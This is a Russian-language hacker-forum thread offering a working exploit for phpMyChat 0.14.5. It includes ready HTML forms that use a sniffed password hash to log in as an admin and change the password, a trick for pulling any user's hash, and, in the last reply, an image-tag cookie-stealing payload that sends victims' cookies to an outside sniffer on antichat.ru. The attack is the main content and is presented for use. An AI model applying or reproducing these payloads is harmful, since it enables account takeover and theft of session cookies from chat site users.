Привет! Я нашел уязвимость в phpMyChat 0.14.5 ,и более поздние версии (может ее и до меня нашли, но вроде я таких уязвимостей не встречал). Суть в том: можно изменить пасс админу (любому пользователю), можно зайти под него ником в чат. Для этого надо знать его ник и хеш (хеш не надо расшифровывать). Допустим, мы узнали с помощью снифера хеш админа. Изменим ему пасс. Вот код страницы Code: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML dir="LTR"> <HEAD> <title>Книга посетителей</title> <LINK REL="stylesheet" HREF="config/start_page.css.php3?Charset=windows-1251&medium=10&FontName=" TYPE="text/css"> <SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.1"> <!-- function get_focus() { window.focus(); document.forms['LoginForm'].elements['AUTH_USERNAME'].focus(); } // --> </SCRIPT> </HEAD> <BODY onLoad="if (window.focus) get_focus();"> <CENTER> <BR> <FORM ACTION="http://www.site.ru/chat/edituser.php3" METHOD="POST" AUTOCOMPLETE="OFF" NAME="LoginForm"> <P></P> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="Link" VALUE="1"> <INPUT TYPE="hidden" NAME="LIMIT" VALUE=""> <TABLE BORDER=0 CELLPADDING=3 CLASS="table"> <TR> <TD ALIGN="CENTER"> <TABLE BORDER=0> <TR> <TH COLSPAN=2 CLASS="tabtitle">Вход в ЧатВиллу</TH> </TR> <TR> <TD VALIGN="TOP" NOWRAP>Ник :</TD> <TD VALIGN="TOP"> <INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="Pr13raK" CLASS="ChatBox"> </TD> </TR> <TR> <TD VALIGN="TOP" NOWRAP>Пароль :</TD> <TD VALIGN="TOP"> <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="310dcbbf4cce62f762a2aaa148d556bd" CLASS="ChatBox"> </TD> </TR> </TABLE> <P> <INPUT TYPE="submit" VALUE="Входим" CLASS="ChatBox"> </TD> </TR> </TABLE> </FORM> </CENTER> </BODY> </HTML> Для этого в поле:<INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="" CLASS="ChatBox"> после слова VALUE пишем его ник. В поле <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="" CLASS="ChatBox"> после слова VALUE пишем его хеш. Все сохраняем страницу в html и нажимаем "Войти" меняем пасс можно и ник и теперь мы админы. Если что-то не понятно пишите [email protected] или стучите в асю: 255553398. Извините если что не понятно это моя первая уязвимость!!! "The pirats of a network" www.pirats.jino-net.ru
хе-х, в этом " phpMyChat 0.14.5 " стока баг, что можно книгу написать... года 2-3 назад друг написал пхп скрипт через которую можно было кикнуть админа, стать модером и тд=) на сколько я помню на античате есть видео по той баге которую ты описал, но и хеш не всегда можно узнать....
Мне стали задавать вопрос: «Как узнать хеш админа, если он не появляется в чате?". Узнать можно. И не только админа, а можно и любого модера или юзера. Вот код страницы: Code: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML dir="LTR"> <HEAD> <title>Книга посетителей</title> <LINK REL="stylesheet" HREF="config/start_page.css.php3?Charset=windows-1251&medium=10&FontName=" TYPE="text/css"> <SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.1"> <!-- function get_focus() { window.focus(); document.forms['LoginForm'].elements['AUTH_USERNAME'].focus(); } // --> </SCRIPT> </HEAD> <BODY onLoad="if (window.focus) get_focus();"> <CENTER> <BR> <FORM ACTION="http://www.site.ru/chat/admin.php3" METHOD="POST" AUTOCOMPLETE="OFF" NAME="LoginForm"> <P></P> <P><SPAN CLASS="error">Неправильный ник или пароль.</SPAN></P><INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="Link" VALUE=""> <INPUT TYPE="hidden" NAME="LIMIT" VALUE=""> <TABLE BORDER=0 CELLPADDING=3 CLASS="table"> <TR> <TD ALIGN="CENTER"> <TABLE BORDER=0> <TR> <TH COLSPAN=2 CLASS="tabtitle">Вход в ЧатВиллу</TH> </TR> <TR> <TD VALIGN="TOP" NOWRAP>Ник :</TD> <TD VALIGN="TOP"> <INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="Lady_Ann" CLASS="ChatBox"> </TD> </TR> <TR> <TD VALIGN="TOP" NOWRAP>Пароль :</TD> <TD VALIGN="TOP"> <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="Lady_Ann" CLASS="ChatBox"> </TD<!-- INSERT --> <INPUT type="hidden" name="do_not_login" value="false"> <!-- END INSERT --> </TR> </TABLE> <P> <INPUT TYPE="submit" VALUE="Входим" CLASS="ChatBox"> </TD> </TR> </TABLE> </FORM> </CENTER> </BODY> </HTML> В строчке <INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="Lady_Ann" CLASS="ChatBox"> после VALUE= Пишем ник В строчке <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="Lady_Ann" CLASS="ChatBox"> после VALUE= тоже пишем этот же ник. А не хеш. Нажимаем "Вход" и видим, ник и пас в виде звездочек. Теперь просматриваем страницу в HTML и ищем строчку <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="342353564asas34523523" CLASS="ChatBox"> Теперь уже после VALUE= будет не ник, а хеш пользователя. "The pirats of a network" www.pirats.jino-net.ru
!!!!!!!!!!!!!!!хе-х, в этом " phpMyChat 0.14.5 " стока баг, что можно книгу написать... года 2-3 назад друг написал пхп скрипт через которую можно было кикнуть админа, стать модером и тд=) на сколько я помню на античате есть видео по той баге которую ты описал, но и хеш не всегда можно узнать....!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Здесь есть видеоно только не по этой баге.Видео о том, как вставлять в чате теги
Давно уже эта уязвимость есть! Вот даже видео http://video.antichat.ru/file71.html А так воруем куки HTML: \x3cimg src="http\x3a//antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e Где http\x3a//antichat.ru/cgi-bin/s.jpg = Путь к сниффу. На данный момент куки прилетят на сниффер Ачата http://antichat.ru/sniff/log.php
